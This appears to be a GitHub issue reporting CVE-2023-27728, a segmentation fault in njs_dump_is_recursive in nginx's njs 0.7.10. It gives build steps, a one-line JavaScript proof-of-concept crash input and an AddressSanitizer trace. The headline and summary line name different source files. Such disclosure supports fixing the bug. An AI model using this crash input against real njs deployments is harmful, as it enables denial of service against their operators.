Headline
CVE-2023-27728: SEGV src/njs_json.c in njs_dump_is_recursive · Issue #618 · nginx/njs
Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_dump_is_recursive at src/njs_vmcode.c.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
ret2ddme opened this issue
Feb 21, 2023
· 0 comments
Comments
Environment
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build :
./configure --cc=clang --address-sanitizer=YES
make
Poc
Object.defineProperty([], 'a’, { configurable: true, enumerable: true, get: Object});
Asan
==31165==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000022 (pc 0x00000053426f bp 0x7ffef5d7b170 sp 0x7ffef5d7a3e0 T0)
==31165==The signal is caused by a READ memory access.
==31165==Hint: address points to the zero page.
#0 0x53426f in njs_dump_is_recursive /root/njs/src/njs_json.c
#1 0x53426f in njs_vm_value_dump /root/njs/src/njs_json.c:2113:13
#2 0x4e0374 in njs_vm_retval_dump /root/njs/src/njs_vm.c:1004:12
#3 0x4c984b in njs_console_output /root/njs/src/njs_shell.c:885:13
#4 0x4cd050 in njs_process_output /root/njs/src/njs_shell.c:1010:9
#5 0x4cad81 in njs_process_script /root/njs/src/njs_shell.c:960:5
#6 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
#7 0x4c94be in main /root/njs/src/njs_shell.c:335:15
#8 0x7f1864672c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#9 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/njs/src/njs_json.c in njs_dump_is_recursive
2 participants